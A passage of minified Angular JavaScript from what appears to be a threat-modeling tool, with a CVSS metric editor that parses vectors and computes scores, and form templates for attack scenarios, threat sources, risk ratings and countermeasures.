10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}.property-form-field[_ngcontent-%COMP%]{width:300px}.disable[_ngcontent-%COMP%]{pointer-events:none}.searchBox[_ngcontent-%COMP%]{padding:0 16px;width:calc(100% - 32px);height:35px!important;line-height:35px!important;font-size:14px;font-weight:400}"]}),t})();var L5e=de(306),z5e=de.n(L5e);function W5e(t,a){if(1&t){const e=Ye();m(0,"table"),s(1,"\n  "),m(2,"tr"),s(3,"\n    "),m(4,"td"),s(5,"\n      Attack Vector (AV) \n      "),m(6,"mat-icon",1),oe(7,"translate"),s(8,"info"),u(),s(9,"\n      "),m(10,"button",2),he("click",function(){return be(e),Me(B().OpenNotes("AV"))}),oe(11,"translate"),s(12,"\n        "),m(13,"mat-icon",3),s(14,"edit_note"),u(),s(15,"\n      "),u(),s(16,"\n    "),u(),s(17,"\n    "),m(18,"td"),s(19,"\n      Scope (S) \n      "),m(20,"mat-icon",1),oe(21,"translate"),s(22,"info"),u(),s(23,"\n      "),m(24,"button",2),he("click",function(){return be(e),Me(B().OpenNotes("S"))}),oe(25,"translate"),s(26,"\n        "),m(27,"mat-icon",3),s(28,"edit_note"),u(),s(29,"\n      "),u(),s(30,"\n    "),u(),s(31,"\n  "),u(),s(32,"\n  "),m(33,"tr"),s(34,"\n    "),m(35,"td"),s(36,"\n      "),m(37,"mat-button-toggle-group",4),he("ngModelChange",function(n){return be(e),Me(B().entry.AV=n)})("change",function(){return be(e),Me(B().CalcScore())}),s(38,"\n        "),m(39,"mat-button-toggle",5),s(40,"Undefined"),u(),s(41,"\n        "),m(42,"mat-button-toggle",6),oe(43,"translate"),s(44,"Network"),u(),s(45,"\n        "),m(46,"mat-button-toggle",7),oe(47,"translate"),s(48,"Adjacent Network"),u(),s(49,"\n        "),m(50,"mat-button-toggle",8),oe(51,"translate"),s(52,"Local"),u(),s(53,"\n        "),m(54,"mat-button-toggle",9),oe(55,"translate"),s(56,"Physical"),u(),s(57,"\n      "),u(),s(58,"\n    "),u(),s(59,"\n    "),m(60,"td"),s(61,"\n      "),m(62,"mat-button-toggle-group",4),he("ngModelChange",function(n){return be(e),Me(B().entry.S=n)})("change",function(){return be(e),Me(B().CalcScore())}),s(63,"\n        "),m(64,"mat-button-toggle",5),s(65,"Undefined"),u(),s(66,"\n        "),m(67,"mat-button-toggle",10),oe(68,"translate"),s(69,"Unchanged"),u(),s(70,"\n        "),m(71,"mat-button-toggle",11),oe(72,"translate"),s(73,"Changed"),u(),s(74,"\n      "),u(),s(75,"\n    "),u(),s(76,"\n  "),u(),s(77,"\n  "),m(78,"tr"),s(79,"\n    "),m(80,"td"),s(81,"\n      Attack Complexity (AC) \n      "),m(82,"mat-icon",1),oe(83,"translate"),s(84,"info"),u(),s(85,"\n      "),m(86,"button",2),he("click",function(){return be(e),Me(B().OpenNotes("AC"))}),oe(87,"translate"),s(88,"\n        "),m(89,"mat-icon",3),s(90,"edit_note"),u(),s(91,"\n      "),u(),s(92,"\n    "),u(),s(93,"\n    "),m(94,"td"),s(95,"\n      Confidentiality (C) \n      "),m(96,"mat-icon",1),oe(97,"translate"),s(98,"info"),u(),s(99,"\n      "),m(100,"button",2),he("click",function(){return be(e),Me(B().OpenNotes("C"))}),oe(101,"translate"),s(102,"\n        "),m(103,"mat-icon",3),s(104,"edit_note"),u(),s(105,"\n      "),u(),s(106,"\n    "),u(),s(107,"\n  "),u(),s(108,"\n  "),m(109,"tr"),s(110,"\n    "),m(111,"td"),s(112,"\n      "),m(113,"mat-button-toggle-group",4),he("ngModelChange",function(n){return be(e),Me(B().entry.AC=n)})("change",function(){return be(e),Me(B().CalcScore())}),s(114,"\n        "),m(115,"mat-button-toggle",5),s(116,"Undefined"),u(),s(117,"\n        "),m(118,"mat-button-toggle",8),oe(119,"translate"),s(120,"Low"),u(),s(121,"\n        "),m(122,"mat-button-toggle",12),oe(123,"translate"),s(124,"High"),u(),s(125,"\n      "),u(),s(126,"\n    "),u(),s(127,"\n    "),m(128,"td"),s(129,"\n      "),m(130,"mat-button-toggle-group",4),he("ngModelChange",function(n){return be(e),Me(B().entry.C=n)})("change",function(){return be(e),Me(B().CalcScore())}),s(131,"\n        "),m(132,"mat-button-toggle",5),s(133,"Undefined"),u(),s(134,"\n        "),m(135,"mat-button-toggle",6),oe(136,"translate"),s(137,"None"),u(),s(138,"\n        "),m(139,"mat-button-toggle",8),oe(140,"translate"),s(141,"Low"),u(),s(142,"\n        "),m(143,"mat-button-toggle",12),oe(144,"translate"),s(145,"High"),u(),s(146,"\n      "),u(),s(147,"\n    "),u(),s(148,"\n  "),u(),s(149,"\n  "),m(150,"tr"),s(151,"\n    "),m(152,"td"),s(153,"\n      Privileges Required (PR) \n      "),m(154,"mat-icon",1),oe(155,"translate"),s(156,"info"),u(),s(157,"\n      "),m(158,"button",2),he("click",function(){return be(e),Me(B().OpenNotes("PR"))}),oe(159,"translate"),s(160,"\n        "),m(161,"mat-icon",3),s(162,"edit_note"),u(),s(163,"\n      "),u(),s(164,"\n    "),u(),s(165,"\n    "),m(166,"td"),s(167,"\n      Integrity (I) \n      "),m(168,"mat-icon",1),oe(169,"translate"),s(170,"info"),u(),s(171,"\n      "),m(172,"button",2),he("click",function(){return be(e),Me(B().OpenNotes("I"))}),oe(173,"translate"),s(174,"\n        "),m(175,"mat-icon",3),s(176,"edit_note"),u(),s(177,"\n      "),u(),s(178,"\n    "),u(),s(179,"\n  "),u(),s(180,"\n  "),m(181,"tr"),s(182,"\n    "),m(183,"td"),s(184,"\n      "),m(185,"mat-button-toggle-group",4),he("ngModelChange",function(n){return be(e),Me(B().entry.PR=n)})("change",function(){return be(e),Me(B().CalcScore())}),s(186,"\n        "),m(187,"mat-button-toggle",5),s(188,"Undefined"),u(),s(189,"\n        "),m(190,"mat-button-toggle",6),oe(191,"translate"),s(192,"None"),u(),s(193,"\n        "),m(194,"mat-button-toggle",8),oe(195,"translate"),s(196,"Low"),u(),s(197,"\n        "),m(198,"mat-button-toggle",12),oe(199,"translate"),s(200,"High"),u(),s(201,"\n      "),u(),s(202,"\n    "),u(),s(203,"\n    "),m(204,"td"),s(205,"\n      "),m(206,"mat-button-toggle-group",4),he("ngModelChange",function(n){return be(e),Me(B().entry.I=n)})("change",function(){return be(e),Me(B().CalcScore())}),s(207,"\n        "),m(208,"mat-button-toggle",5),s(209,"Undefined"),u(),s(210,"\n        "),m(211,"mat-button-toggle",6),oe(212,"translate"),s(213,"None"),u(),s(214,"\n        "),m(215,"mat-button-toggle",8),oe(216,"translate"),s(217,"Low"),u(),s(218,"\n        "),m(219,"mat-button-toggle",12),oe(220,"translate"),s(221,"High"),u(),s(222,"\n      "),u(),s(223,"\n    "),u(),s(224,"\n  "),u(),s(225,"\n  "),m(226,"tr"),s(227,"\n    "),m(228,"td"),s(229,"\n      User Interaction (UI) \n      "),m(230,"mat-icon",1),oe(231,"translate"),s(232,"info"),u(),s(233,"\n      "),m(234,"button",2),he("click",function(){return be(e),Me(B().OpenNotes("UI"))}),oe(235,"translate"),s(236,"\n        "),m(237,"mat-icon",3),s(238,"edit_note"),u(),s(239,"\n      "),u(),s(240,"\n    "),u(),s(241,"\n    "),m(242,"td"),s(243,"\n      Availability (A) \n      "),m(244,"mat-icon",1),oe(245,"translate"),s(246,"info"),u(),s(247,"\n      "),m(248,"button",2),he("click",function(){return be(e),Me(B().OpenNotes("A"))}),oe(249,"translate"),s(250,"\n        "),m(251,"mat-icon",3),s(252,"edit_note"),u(),s(253,"\n      "),u(),s(254,"\n    "),u(),s(255,"\n  "),u(),s(256,"\n  "),m(257,"tr"),s(258,"\n    "),m(259,"td"),s(260,"\n      "),m(261,"mat-button-toggle-group",4),he("ngModelChange",function(n){return be(e),Me(B().entry.UI=n)})("change",function(){return be(e),Me(B().CalcScore())}),s(262,"\n        "),m(263,"mat-button-toggle",5),s(264,"Undefined"),u(),s(265,"\n        "),m(266,"mat-button-toggle",6),oe(267,"translate"),s(268,"None"),u(),s(269,"\n        "),m(270,"mat-button-toggle",13),oe(271,"translate"),s(272,"Required"),u(),s(273,"\n      "),u(),s(274,"\n    "),u(),s(275,"\n    "),m(276,"td"),s(277,"\n      "),m(278,"mat-button-toggle-group",4),he("ngModelChange",function(n){return be(e),Me(B().entry.A=n)})("change",function(){return be(e),Me(B().CalcScore())}),s(279,"\n        "),m(280,"mat-button-toggle",5),s(281,"Undefined"),u(),s(282,"\n        "),m(283,"mat-button-toggle",6),oe(284,"translate"),s(285,"None"),u(),s(286,"\n        "),m(287,"mat-button-toggle",8),oe(288,"translate"),s(289,"Low"),u(),s(290,"\n        "),m(291,"mat-button-toggle",12),oe(292,"translate"),s(293,"High"),u(),s(294,"\n      "),u(),s(295,"\n    "),u(),s(296,"\n  "),u(),s(297,"\n  "),m(298,"tr"),s(299,"\n    "),m(300,"td"),s(301,"\n      "),m(302,"mat-form-field",14),s(303,"\n        "),m(304,"mat-label"),s(305),oe(306,"translate"),u(),s(307,"\n        "),m(308,"input",15),he("ngModelChange",function(n){return be(e),Me(B().Vector=n)}),u(),s(309,"\n      "),u(),s(310,"\n      "),m(311,"button",16),he("click",function(){return be(e),Me(B().CopyVector())}),oe(312,"translate"),s(313,"\n        "),m(314,"mat-icon"),s(315,"content_copy"),u(),s(316,"\n      "),u(),s(317,"\n    "),u(),s(318,"\n    "),m(319,"td"),s(320,"\n      "),m(321,"mat-form-field",14),s(322,"\n        "),m(323,"mat-label"),s(324),oe(325,"translate"),u(),s(326,"\n        "),m(327,"input",17),he("ngModelChange",function(n){return be(e),Me(B().Score=n)}),u(),s(328,"\n      "),u(),s(329,"\n      "),m(330,"button",16),he("click",function(){return be(e),Me(B().OpenCVSS())}),oe(331,"translate"),s(332,"\n        "),m(333,"mat-icon"),s(334,"open_in_new"),u(),s(335,"\n      "),u(),s(336,"\n    "),u(),s(337,"\n  "),u(),s(338,"\n"),u()}if(2&t){const e=B();C(6),at("matTooltip",re(7,68,"shared.cvss.av")),C(4),at("matTooltip",re(11,70,"general.Notes")),C(3),V("matBadge",e.GetNotesCountOfMetric("AV"))("matBadgeHidden",e.GetNotesCountOfMetric("AV")<1),C(7),at("matTooltip",re(21,72,"shared.cvss.s")),C(4),at("matTooltip",re(25,74,"general.Notes")),C(3),V("matBadge",e.GetNotesCountOfMetric("S"))("matBadgeHidden",e.GetNotesCountOfMetric("S")<1),C(10),V("ngModel",e.entry.AV),C(5),at("matTooltip",re(43,76,"shared.cvss.av.n")),C(4),at("matTooltip",re(47,78,"shared.cvss.av.a")),C(4),at("matTooltip",re(51,80,"shared.cvss.av.l")),C(4),at("matTooltip",re(55,82,"shared.cvss.av.p")),C(8),V("ngModel",e.entry.S),C(5),at("matTooltip",re(68,84,"shared.cvss.s.u")),C(4),at("matTooltip",re(72,86,"shared.cvss.s.c")),C(11),at("matTooltip",re(83,88,"shared.cvss.ac")),C(4),at("matTooltip",re(87,90,"general.Notes")),C(3),V("matBadge",e.GetNotesCountOfMetric("AC"))("matBadgeHidden",e.GetNotesCountOfMetric("AC")<1),C(7),at("matTooltip",re(97,92,"shared.cvss.c")),C(4),at("matTooltip",re(101,94,"general.Notes")),C(3),V("matBadge",e.GetNotesCountOfMetric("C"))("matBadgeHidden",e.GetNotesCountOfMetric("C")<1),C(10),V("ngModel",e.entry.AC),C(5),at("matTooltip",re(119,96,"shared.cvss.ac.l")),C(4),at("matTooltip",re(123,98,"shared.cvss.ac.h")),C(8),V("ngModel",e.entry.C),C(5),at("matTooltip",re(136,100,"shared.cvss.c.n")),C(4),at("matTooltip",re(140,102,"shared.cvss.c.l")),C(4),at("matTooltip",re(144,104,"shared.cvss.c.h")),C(11),at("matTooltip",re(155,106,"shared.cvss.pr")),C(4),at("matTooltip",re(159,108,"general.Notes")),C(3),V("matBadge",e.GetNotesCountOfMetric("PR"))("matBadgeHidden",e.GetNotesCountOfMetric("PR")<1),C(7),at("matTooltip",re(169,110,"shared.cvss.i")),C(4),at("matTooltip",re(173,112,"general.Notes")),C(3),V("matBadge",e.GetNotesCountOfMetric("I"))("matBadgeHidden",e.GetNotesCountOfMetric("I")<1),C(10),V("ngModel",e.entry.PR),C(5),at("matTooltip",re(191,114,"shared.cvss.pr.n")),C(4),at("matTooltip",re(195,116,"shared.cvss.pr.l")),C(4),at("matTooltip",re(199,118,"shared.cvss.pr.h")),C(8),V("ngModel",e.entry.I),C(5),at("matTooltip",re(212,120,"shared.cvss.i.n")),C(4),at("matTooltip",re(216,122,"shared.cvss.i.l")),C(4),at("matTooltip",re(220,124,"shared.cvss.i.h")),C(11),at("matTooltip",re(231,126,"shared.cvss.ui")),C(4),at("matTooltip",re(235,128,"general.Notes")),C(3),V("matBadge",e.GetNotesCountOfMetric("UI"))("matBadgeHidden",e.GetNotesCountOfMetric("UI")<1),C(7),at("matTooltip",re(245,130,"shared.cvss.a")),C(4),at("matTooltip",re(249,132,"general.Notes")),C(3),V("matBadge",e.GetNotesCountOfMetric("A"))("matBadgeHidden",e.GetNotesCountOfMetric("A")<1),C(10),V("ngModel",e.entry.UI),C(5),at("matTooltip",re(267,134,"shared.cvss.ui.n")),C(4),at("matTooltip",re(271,136,"shared.cvss.ui.r")),C(8),V("ngModel",e.entry.A),C(5),at("matTooltip",re(284,138,"shared.cvss.a.n")),C(4),at("matTooltip",re(288,140,"shared.cvss.a.l")),C(4),at("matTooltip",re(292,142,"shared.cvss.a.h")),C(14),ke(re(306,144,"report.CvssVector")),C(3),V("ngModel",e.Vector),C(3),at("matTooltip",re(312,146,"general.Copy")),C(13),ke(re(325,148,"report.CvssScore")),C(3),V("ngModel",e.Score),C(3),at("matTooltip",re(331,150,"general.openInNew"))}}let Wm=(()=>{class t{constructor(e,i,n,r){this.data=e,this.dataService=i,this.dialog=n,this.clipboard=r,e&&(this.entry=e.Value)}get Score(){return this.entry.Score}set Score(e){this.entry.Score=e}get Vector(){return t.GetVector(this.entry)}set Vector(e){this.SetVector(e)}ngOnInit(){var e;this.Score||this.CalcScore(),null!==(e=this.entry)&&void 0!==e&&e.Notes||(this.entry.Notes={})}CopyVector(){this.clipboard.copy(this.Vector)}OpenCVSS(){const e=t.GetURL(this.entry);e&&window.open(e,"_blank")}CalcScore(){let e=t.GetVector(this.entry);if(e&&e.length>8){const i=new(z5e())(e);this.Score=i.getBaseScore()}}SetVector(e){if(e){let i=!0;const n=["AV","AC","PR","UI","S","C","I","A","CVSS"],r=T=>{const k=n.indexOf(T);k>=0&&n.splice(k,1)},c={};e.split("/").forEach(T=>{if(i){const k=T.split(":");if(2==k.length)if(n.includes(k[0]))switch(k[0]){case"AV":["N","A","L","P"].includes(k[1])?(c[k[0]]=k[1],r(k[0])):i=!1;break;case"AC":["L","H"].includes(k[1])?(c[k[0]]=k[1],r(k[0])):i=!1;break;case"PR":case"C":case"I":case"A":["N","L","H"].includes(k[1])?(c[k[0]]=k[1],r(k[0])):i=!1;break;case"UI":["N","R"].includes(k[1])?(c[k[0]]=k[1],r(k[0])):i=!1;break;case"S":["U","C"].includes(k[1])?(c[k[0]]=k[1],r(k[0])):i=!1;break;case"CVSS":["2.0","3.0","3.1"].includes(k[1])?(c.Version=k[1],r(k[0])):i=!1;break;default:i=!1}else i=!1;else i=!1}}),i&&(Object.keys(c).forEach(T=>{this.entry[T]=c[T]}),this.CalcScore())}}OpenNotes(e){null==this.entry.Notes[e]&&(this.entry.Notes[e]=[]),this.dialog.OpenNotesDialog(this.entry.Notes[e],!0,!1,!0,!0)}GetNotesCountOfMetric(e){return this.entry.Notes[e]?this.entry.Notes[e].length:0}static ToThreatSeverity(e){return e>=9?cn.Critical:e>=7?cn.High:e>=4?cn.Medium:e>0?cn.Low:cn.None}static GetURL(e){let i=t.GetVector(e);const n=e.Version?e.Version:"3.1";return i?"https://nvd.nist.gov/vuln-metrics/cvss/v"+n[0]+"-calculator?vector="+i.substring(i.indexOf("/")+1)+"&version="+n:null}static GetVector(e){if(e){let i="CVSS:"+(e.Version?e.Version:"3.1");return e.Vector?e.Vector.includes("CVSS")?e.Vector:i+"/"+e.Vector:(["AV","AC","PR","UI","S","C","I","A"].forEach(r=>{e[r]&&e[r].length>0&&(i+="/"+r+":"+e[r])}),i)}return null}}return t.\u0275fac=function(e){return new(e||t)(Ee(k5,8),Ee(Yi),Ee(Wn),Ee(hz))},t.\u0275cmp=Wt({type:t,selectors:[["app-cvss-entry"]],inputs:{entry:"entry"},decls:1,vars:1,consts:[[4,"ngIf"],["matTooltipShowDelay","1000",2,"vertical-align","inherit",3,"matTooltip"],["mat-icon-button","",3,"matTooltip","click"],["matBadgeColor","warn","matBadgePosition","below",3,"matBadge","matBadgeHidden"],[3,"ngModel","ngModelChange","change"],["value",""],["value","N","matTooltipShowDelay","1000",3,"matTooltip"],["value","A","matTooltipShowDelay","1000",3,"matTooltip"],["value","L","matTooltipShowDelay","1000",3,"matTooltip"],["value","P","matTooltipShowDelay","1000",3,"matTooltip"],["value","U","matTooltipShowDelay","1000",3,"matTooltip"],["value","C","matTooltipShowDelay","1000",3,"matTooltip"],["value","H","matTooltipShowDelay","1000",3,"matTooltip"],["value","R","matTooltipShowDelay","1000",3,"matTooltip"],["appearance","fill",2,"width","calc(100% - 45px)"],["matInput","",3,"ngModel","ngModelChange"],["mat-icon-button","","matTooltipShowDelay","1000",2,"vertical-align","super","pointer-events","all",3,"matTooltip","click"],["matInput","","type","number",3,"ngModel","ngModelChange"]],template:function(e,i){1&e&&ne(0,W5e,339,152,"table",0),2&e&&V("ngIf",null!=i.entry)},dependencies:[Ri,an,Ac,Ta,Ea,oa,Hh,da,nn,un,Xa,Pa,b8,M8,Xi]}),t})();const F5e=["nameBox"],V5e=["searchASBox"],B5e=["searchLinkedASBox"],H5e=["searchCMBox"],U5e=["searchTCBox"];function q5e(t,a){if(1&t){const e=Ye();m(0,"button",69),he("click",function(){return be(e),Me(B(2).attackScenario.Name="")}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n    "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function G5e(t,a){1&t&&(m(0,"mat-hint",70),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct("\n      ",re(2,1,"messages.error.numberAlreadyExists"),"\n    "))}function j5e(t,a){if(1&t&&(m(0,"mat-option",71),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetThreatStateName(e)))}}function Q5e(t,a){1&t&&(m(0,"mat-icon",72),oe(1,"translate"),s(2,"sync_problem"),u()),2&t&&at("matTooltip",re(1,1,"pages.modeling.attackscenario.ruleNotApplyingAnymore"))}function $5e(t,a){if(1&t&&(m(0,"mat-option",71),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ct("\n          ",e.Name,"\n        ")}}function K5e(t,a){if(1&t&&(m(0,"mat-optgroup",73),s(1,"\n        "),ne(2,$5e,2,2,"mat-option",10),s(3,"\n      "),u()),2&t){const e=a.$implicit;V("label",e.name),C(2),V("ngForOf",e.AttackVectors)}}function X5e(t,a){if(1&t&&(m(0,"mat-option",75),s(1),u()),2&t){const e=a.$implicit;at("matTooltip",e.Description),V("value",e),C(1),ct("\n          ",e.Name,"\n        ")}}function Y5e(t,a){if(1&t&&(m(0,"mat-optgroup",73),s(1,"\n        "),ne(2,X5e,2,3,"mat-option",74),s(3,"\n      "),u()),2&t){const e=a.$implicit;V("label",e.name),C(2),V("ngForOf",e.ThreatCategories)}}function J5e(t,a){if(1&t&&(m(0,"mat-option",75),s(1),u()),2&t){const e=a.$implicit;at("matTooltip",e.Description),V("value",e),C(1),ct("\n          ",e.Name,"\n        ")}}function Z5e(t,a){if(1&t&&(m(0,"mat-optgroup",73),oe(1,"translate"),s(2,"\n        "),ne(3,J5e,2,3,"mat-option",74),s(4,"\n      "),u()),2&t){const e=a.$implicit;at("label",re(1,2,e.name)),C(3),V("ngForOf",e.SystemThreats)}}function e7e(t,a){if(1&t){const e=Ye();m(0,"mat-checkbox",79),he("change",function(n){return be(e),Me(B(3).ThreatSourcesUpdate(n.checked))}),s(1),oe(2,"translate"),u()}if(2&t){const e=B(3);V("checked",e.ThreatSourcesAll())("indeterminate",e.ThreatSourcesSome()),C(1),ke(re(2,3,e.ThreatSourcesLabel()))}}function t7e(t,a){if(1&t&&(m(0,"mat-option",75),oe(1,"translate"),oe(2,"translate"),s(3),u()),2&t){const e=a.$implicit,i=B(3);Kc("matTooltip","",re(1,4,"general.Likelihood"),": ",re(2,6,i.GetLMHName(e.Likelihood)),""),V("value",e),C(3),ct("\n        ",e.Name,"\n      ")}}function i7e(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",76),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"mat-select",24),he("valueChange",function(n){return be(e),Me(B(2).attackScenario.ThreatSources=n)}),s(7,"\n      "),m(8,"input",18,77),he("keyup",function(n){return be(e),Me(B(2).OnSearchThreatSources(n))}),oe(10,"translate"),u(),s(11,"\n      "),ne(12,e7e,3,5,"mat-checkbox",78),s(13,"\n      "),ne(14,t7e,4,8,"mat-option",74),s(15,"\n    "),u(),s(16,"\n  "),u()}if(2&t){const e=Ti(9),i=B(2);C(3),ke(re(4,5,"general.ThreatSources")),C(3),V("value",i.attackScenario.ThreatSources),C(2),at("placeholder",re(10,7,"general.Search")),C(4),V("ngIf",0==e.value.length),C(2),V("ngForOf",i.GetThreatSources())}}const A5=function(t){return{item:t}};function a7e(t,a){if(1&t&&(m(0,"button",80),s(1),u()),2&t){const e=a.$implicit;B(),V("matMenuTriggerFor",Ti(178))("matMenuTriggerData",fr(3,A5,e.scenarios)),C(1),ke(e.name)}}function n7e(t,a){if(1&t){const e=Ye();m(0,"button",81),he("click",function(){const r=be(e).$implicit;return Me(B(3).AdoptRiskValuesFrom(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),C(1),ke(e.Name)}}function o7e(t,a){if(1&t&&(s(0,"\n      "),ne(1,n7e,2,2,"button",40),s(2,"\n    ")),2&t){const e=a.item;C(1),V("ngForOf",e)}}function r7e(t,a){if(1&t){const e=Ye();m(0,"button",81),he("click",function(){const r=be(e).$implicit;return Me(B(2).AdoptRiskValuesFrom(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),C(1),ke(e.Name)}}function s7e(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",82),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"input",83),he("ngModelChange",function(n){return be(e),Me(B(2).attackScenario.ScoreCVSS.Score=n)}),u(),s(7,"\n    "),m(8,"button",84),he("click",function(n){return be(e),B(2).EditMethodCVSS(),Me(n.stopPropagation())}),s(9,"\n      "),m(10,"mat-icon"),s(11,"edit"),u(),s(12,"\n    "),u(),s(13,"\n    "),m(14,"button",85),he("click",function(n){return be(e),B(2).RemoveMethodCVSS(),Me(n.stopPropagation())}),s(15,"\n      "),m(16,"mat-icon"),s(17,"delete"),u(),s(18,"\n    "),u(),s(19,"\n  "),u()}if(2&t){const e=B(2);C(3),ke(re(4,2,"shared.cvss.name.s")),C(3),V("ngModel",e.attackScenario.ScoreCVSS.Score)}}function c7e(t,a){if(1&t&&(m(0,"mat-option",71),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(3);V("value",e),C(1),ke(re(2,2,i.GetSeverityTypeName(e)))}}function l7e(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",82),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"mat-select",46),he("valueChange",function(n){return be(e),Me(B(2).attackScenario.ScoreOwaspRR.Score=n)}),s(7,"\n      "),m(8,"mat-option"),s(9),oe(10,"translate"),u(),s(11,"\n      "),ne(12,c7e,3,4,"mat-option",10),s(13,"\n    "),u(),s(14,"\n    "),m(15,"button",84),he("click",function(n){return be(e),B(2).EditMethodOwaspRR(),Me(n.stopPropagation())}),s(16,"\n      "),m(17,"mat-icon"),s(18,"edit"),u(),s(19,"\n    "),u(),s(20,"\n    "),m(21,"button",85),he("click",function(n){return be(e),B(2).RemoveMethodOwaspRR(),Me(n.stopPropagation())}),s(22,"\n      "),m(23,"mat-icon"),s(24,"delete"),u(),s(25,"\n    "),u(),s(26,"\n  "),u()}if(2&t){const e=B(2);C(3),ke(re(4,4,"shared.owasprr.name.s")),C(3),V("value",e.attackScenario.ScoreOwaspRR.Score),C(3),ke(re(10,6,"properties.selectNone")),C(3),V("ngForOf",e.GetSeverityTypes())}}function d7e(t,a){if(1&t&&(m(0,"mat-option",71),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetSeverityTypeName(e)))}}function m7e(t,a){if(1&t){const e=Ye();m(0,"button",86),he("click",function(n){return be(e),B(2).attackScenario.SeverityReason="",Me(n.stopPropagation())}),s(1,"\n      "),m(2,"mat-icon"),s(3,"edit_note"),u(),s(4,"\n    "),u()}}function u7e(t,a){if(1&t){const e=Ye();m(0,"button",86),he("click",function(n){return be(e),B(2).attackScenario.SeverityReason=null,Me(n.stopPropagation())}),s(1,"\n      "),m(2,"mat-icon"),s(3,"playlist_remove"),u(),s(4,"\n    "),u()}}function h7e(t,a){if(1&t&&(m(0,"mat-option",71),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetLMHName(e)))}}function f7e(t,a){if(1&t){const e=Ye();m(0,"button",86),he("click",function(n){return be(e),B(2).attackScenario.LikelihoodReason="",Me(n.stopPropagation())}),s(1,"\n      "),m(2,"mat-icon"),s(3,"edit_note"),u(),s(4,"\n    "),u()}}function p7e(t,a){if(1&t){const e=Ye();m(0,"button",86),he("click",function(n){return be(e),B(2).attackScenario.LikelihoodReason=null,Me(n.stopPropagation())}),s(1,"\n      "),m(2,"mat-icon"),s(3,"playlist_remove"),u(),s(4,"\n    "),u()}}function _7e(t,a){if(1&t&&(m(0,"mat-option",71),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetSeverityTypeName(e)))}}function g7e(t,a){if(1&t){const e=Ye();m(0,"button",86),he("click",function(n){return be(e),B(2).attackScenario.RiskReason="",Me(n.stopPropagation())}),s(1,"\n      "),m(2,"mat-icon"),s(3,"edit_note"),u(),s(4,"\n    "),u()}}function C7e(t,a){if(1&t){const e=Ye();m(0,"button",86),he("click",function(n){return be(e),B(2).attackScenario.RiskReason=null,Me(n.stopPropagation())}),s(1,"\n      "),m(2,"mat-icon"),s(3,"playlist_remove"),u(),s(4,"\n    "),u()}}function y7e(t,a){if(1&t&&(m(0,"mat-option",71),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetRiskStrategyName(e)))}}function b7e(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",26),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"textarea",27),he("ngModelChange",function(n){return be(e),Me(B(2).attackScenario.SeverityReason=n)}),u(),s(7,"\n  "),u()}if(2&t){const e=B(2);C(3),ke(re(4,3,"properties.SeverityReason")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.attackScenario.SeverityReason)}}function M7e(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",26),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"textarea",27),he("ngModelChange",function(n){return be(e),Me(B(2).attackScenario.LikelihoodReason=n)}),u(),s(7,"\n  "),u()}if(2&t){const e=B(2);C(3),ke(re(4,3,"properties.LikelihoodReason")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.attackScenario.LikelihoodReason)}}function v7e(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",26),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"textarea",27),he("ngModelChange",function(n){return be(e),Me(B(2).attackScenario.RiskReason=n)}),u(),s(7,"\n  "),u()}if(2&t){const e=B(2);C(3),ke(re(4,3,"properties.RiskReason")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.attackScenario.RiskReason)}}function A7e(t,a){if(1&t&&(m(0,"button",80),s(1),u()),2&t){const e=a.$implicit;B(),V("matMenuTriggerFor",Ti(321))("matMenuTriggerData",fr(3,A5,e.countermeasures)),C(1),ke(e.name)}}function T7e(t,a){if(1&t){const e=Ye();m(0,"button",81),he("click",function(){const r=be(e).$implicit;return Me(B(3).AddExistingCountermeasure(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),C(1),ke(e.Name)}}function E7e(t,a){if(1&t&&(s(0,"\n              "),ne(1,T7e,2,2,"button",40),s(2,"\n            ")),2&t){const e=a.item;C(1),V("ngForOf",e)}}function D7e(t,a){if(1&t){const 